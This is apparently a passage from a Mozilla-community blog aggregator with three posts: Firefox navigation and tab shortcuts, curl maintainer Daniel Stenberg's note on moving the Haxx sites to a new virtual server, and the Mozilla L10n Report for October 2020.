It’s sort of Quantumbar-adjacent, but once you’ve been using it for a few hours the Search Keyword feature is one of those things you just don’t go back to not having. If you right-click on a search field on just about any site, “Add a Keyword for this Search” is one of the options. Give it a simple term or letter, then type “<term or letter> <search term>” in the Quantumbar and you’re immediately doing that search. A lot of us have that set up for Bugzilla, Github, or Stack Overflow, but just about any search box on just about any site works. If you’re finding yourself searching particular forums, or anywhere search engines can’t reach, this is a fantastic feature.

There are a lot of other small navigation tricks that come in surprisingly handy:

  • Holding down Alt while selecting text allows you to select text within a link without triggering the link
  • Shift-right-click will show Firefox’s context menu even on sites that override it. This is great for Picture-in-Picture on most video sites, and for getting your expected context menu back from GDocs. (PiP is another feature I’m fond of.)
  • Clicking and dragging down on the forward and back buttons will show a list of previous or next pages this tab has visited.
  • You can use Ctrl-click and middle-mouseclick on most toolbar buttons to open whatever they point at in a new tab; Ctrl-reload  duplicates your current tab. You can use this trick to pop stuff out of the middle of your back and forward history stack into new tabs.
  • You can do this trick with the “view image”  option in the right-click menu, too – Ctrl-clicking that menu item will open that image in its own new tab.
  • New Tab then Undo – Ctrl-T then Ctrl-Z – will populate the address bar with the URL of the previously focused tab, and it’s a useful way to duplicate the current tab from the keyboard.
  • You can right click an iframe and use the This Frame option to open the iframe in a tab of its own, then access the URL and other things.
  • Ctrl+Shift+N will reopen the most recently closed window, Ctrl+Shift+T the most recently closed tab. The tabs are a history stack, so you can keep re-opening them.
  • Knowing you can use Ctrl-M to mute a tab is invaluable.

If you’re a tab-hoarder like me, there’s a lot here to make your life better; Ctrl-1 through Ctrl-8 will switch you to the corresponding tab, and Ctrl-9 takes you to the rightmost tab (in left-to-right language layouts; it’s mirrored in RTL). You might want to look over the whole list of keyboard shortcuts, if that’s your thing. There are a lot of them. But probably the most underappreciated is that you can select multiple tabs by using Shift-click, so you can work on them as a group. Ctrl-click will also let you select non-adjacent tabs, as you might expect, and once you’ve selected a few you can:

  • Move them as a group, left, right, new window, into Container tabs, you name it.
  • Pin them (Pinned tabs are another fantastic feature, and the combination of pinned tabs and ctrl-# is very nice.)
  • Mute a bunch of tabs at once.
  • If you’ve got Sync set up – and if you’ve got more than one device, seriously, make your life better and set up sync! – you can right-click and send them all to a different device. If you’ve got Firefox on your phone, “send these ten tabs to my phone” is one click. That action is privacy-respecting, too – nobody can see what you’re sending over, not even Mozilla.

I suspect it’s also not widely appreciated that you can customize Firefox in some depth, another option not widely available in other browsers. Click that three-bar menu in the upper right, click customize; there’s a lot there.

  • You get light, dark and Alpenglow themes stock, and you can find a bunch more on AMO to suit your taste.
  • There’s a few buttons in there for features you didn’t know Firefox had, and you can put them wherever
  • Density is a nice tweak, and removing the title bar is great for squeezing more real estate out of smaller laptop screens.
  • Overflow menu is a great place to put lightly used extensions or buttons
  • There’s a few Easter eggs in there, too, I’m told?

You can also play some games with named profiles that a lot of people doing web development find useful as well. By modifying your desktop shortcuts to add “-P [profile name] -no-remote” after the firefox.exe bit, you can have “personal Firefox” and “work Firefox” running independently and fully separately from each other. That’s getting a bit esoteric, but if you do a lot of webdev or testing you might find it helpful.

So, there you go, I hope it’s helpful.

I’ll keep that casual survey running for a while, but if your personal favorite pet feature isn’t in there, feel free to email me. I know there are more.

Daniel StenbergA server transition

The main physical server (we call it giant) is the machine we’ve been using at Haxx for a very long time to host sites and services for 20+ domains and even more mailing lists. It has been colocated in an ISP server room for over a decade and has served us very well, but it has started to show its age.

Some of the more known sites and services it hosts are perhaps curl, c-ares, libssh2 and this blog (my entire daniel.haxx.se site). Some of these services are however primarily accessed via fronting CDN servers.

giant is a physical Dell PowerEdge 1850 server from 2005, which has undergone upgrades of CPU, disks and memory through the years.

giant featured an Intel X3440 Xeon CPU at 2.53GHz with 8GB of ram when decommissioned.

New host

The new host is of course entirely virtual and we’ve finally taken the step into the modern world of VPSes. The new machine is hosted by the same provider as before but as an entirely new instance.

We’ve upgraded the OS, all packages and we’ve remodeled how we run the web services and all our jobs and services from before have been moved into this new fresh server in an attempt to leave some of the worst legacies behind.

The former server will not be used anymore and will be powered down and sent for recycling.

Glitches in this new world

We’ve tried really hard to make this transition transparent, and ideally not many users will notice anything or have a reason to bother about this, but of course we also realize that we probably have not managed this to 100% perfection. If you detect something on any of the services we run that used to work or exist but no longer does, do let us know so that we become aware of it and can work on a fix!

This site (daniel.haxx.se) already moved weeks ago and nobody noticed. The curl site changed on October 23 and is much more likely to get glitches because of the many more scripts and automatic things set up for it. Both sites are served via Fastly so ordinary users will not detect or spot that there’s a new host in the back end.

Mozilla Localization (L10N)L10n Report: October 2020 Edition

New content and projects

What’s new or coming up in Firefox desktop

Upcoming deadlines:

  • Firefox 83 is currently in beta and will be released on November 17. The deadline to update localization is on November 8 (see the previous l10n report to understand why it moved closer to the release date).
  • There might be changes to the release schedule in December. If that happens, we’ll make sure to cover them in the upcoming report.

The number of new strings remains pretty low, but there was a change that landed without new string IDs: English switched from a hyphen (-) to an em dash (–) as the separator for window titles. Since this is a choice that belongs to each locale, and the current translation might already be correct, we decided not to invalidate all existing translations, and to notify localizers instead.

You can see the details of the strings that changed in this changeset. The full list of IDs, in case you want to search for them in Pontoon:

  • browser-main-window
  • browser-main-window-mac
  • page-info-page
  • page-info-frame
  • webrtc-indicator-title
  • tabs.containers.tooltip
  • webrtcIndicator.windowtitle
  • timeline.cssanimation.nameLabel
  • timeline.csstransition.nameLabel
  • timeline.scriptanimation.nameLabel
  • toolbox.titleTemplate1
  • toolbox.titleTemplate2
  • TitleWithStatus
  • profileTooltip

Alternatively, you can search for “ – “ in Pontoon, but you’ll have to skim through a lot of results, since Pontoon searches also in comments.

What’s new or coming up in mobile

Firefox for iOS v29, as well as iOS v14, both recently shipped – bringing with them the possibility to make Firefox your default browser for the first time ever!

v29 also introduced a Firefox homescreen widget, and more widgets will likely come soon. Congratulations to all for helping localize these awesome new features!

v30 strings have just recently been exposed on Pontoon, and the deadline for l10n strings completion is November 4th. Screenshots will be updated for testing very soon.

Firefox for Android (“Fenix”) is currently open for localizing v83 strings. The next couple of weeks should be used for completing your current pending strings, as well as testing your work for the release. Take a look at our updated docs here!

What’s new or coming up in web projects

Mozilla.org

Recently, the monthly WNP pages that went out with the Firefox releases contained content promoting features that were not available in global markets, or campaign messages that targeted a select few markets. In these situations, for all the other locales, the page was always redirected to the evergreen WNP page. As a result, please make it a high priority to complete the page if your locale has not done so yet.

More pages were added and migrated to Fluent format. For migrated content, the web team has decided not to make any edits until there is a major content update or page layout redesign. Please take the time to resolve errors first as the page may have been activated. If a placeable error is not fixed, it will be shown on production.

Common Voice & WebThings Gateway

Both projects now have a new point of contact. If you want to add a new language or have any questions with the strings, send an email directly to the person first. Follow the projects’ latest development through the channels on Discourse. The l10n-drivers will continue to provide support to both teams through the Pontoon platform.

What’s new or coming up in SuMo

Please help us localize the following articles for Firefox 82 (desktop and Android):

What’s new or coming up in Pontoon

Spring cleaning on the road to Django 3. Our new contributor Philipp started the process of upgrading Django to the latest release. In a period of 12 days, he landed 12(!) patches, ranging from library updates and replacing out-of-date libraries with native Python and Django capabilities to making our testing infrastructure more consistent and dropping unused code. Well done, Philipp! Thanks to Axel and Jotes for the reviews.

Newly published localizer facing documentation

Firefox for Android docs have been updated to reflect the recent changes introduced by our migration to the new “Fenix” browser. We invite you to take a look as there are many changes to the Firefox for Android localization workflow.

Events

Kudos to these long-time Mozillians who found creative ways to spread the word, promoting their languages and sharing their experience over the public airwaves.

  • Wim of Frisian was interviewed by a local radio station, where he shared his passion for localizing Mozilla projects. He took the opportunity to promote Common Voice and call for volunteers who speak Frisian. Since the story aired, Frisian has seen an increase of 11 hours of spoken clips, and between 250 and 400 more people have donated their voices. The interview will be aired monthly.
  • Quentin of Occitan made an appearance in this local news story in the south of France, talking about using Pontoon to localize Mozilla products in Occitan.

Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Friends of the Lion

Image by Elio Qoshi

  • Iskandar of Indonesian community for his huge efforts completing Firefox for Android (Fenix) localization in recent months.
  • Dian Ina and Andika of Indonesian community for their huge efforts completing the Thunderbird localization in recent months!

Know someone in your l10n community who’s been doing a great job and should appear here? Contact one of the l10n-drivers and we’ll make sure they get a shout-out (see list at the bottom)!

Useful Links

Questions? Want to get involved?

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.